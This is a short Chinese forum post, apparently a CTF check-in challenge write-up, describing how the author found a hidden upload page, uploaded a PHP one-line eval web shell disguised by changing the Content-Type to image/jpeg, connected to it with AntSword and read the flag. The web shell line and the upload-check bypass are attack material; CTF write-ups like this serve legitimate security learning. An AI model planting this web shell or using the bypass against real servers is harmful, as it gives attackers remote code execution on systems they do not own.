首页
社区
课程
招聘
[原创]签到WP
发表于: 2024-8-15 23:08 72

[原创]签到WP

2024-8-15 23:08
72

初始界面有三个按钮,红色的有跳转 flag.php,黄色的是刷新界面。
跳转至 flag.php,用 ctrl+U 打开源码,在最下面看见提示
base64解密后得到:hidden_page.php
hidden_page.php 发现文件上传功能
上传一句话木马:<?php @eval($_POST["cmd"]); ?>
显示只能上传 jpg 和 png 文件,猜测通过更改 Content-Type 为
image/jpeg 绕过
抓包更改
无错误提示,猜测上传成功
无路径显示,尝试访问子目录/upload 查看是否存在
可访问,空白显示,确认上传成功,用蚁剑连接
在根目录下看见 flag 文件:
flag{35ebaec6-3155-4ac9-b1fd-76fde3f24277}


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//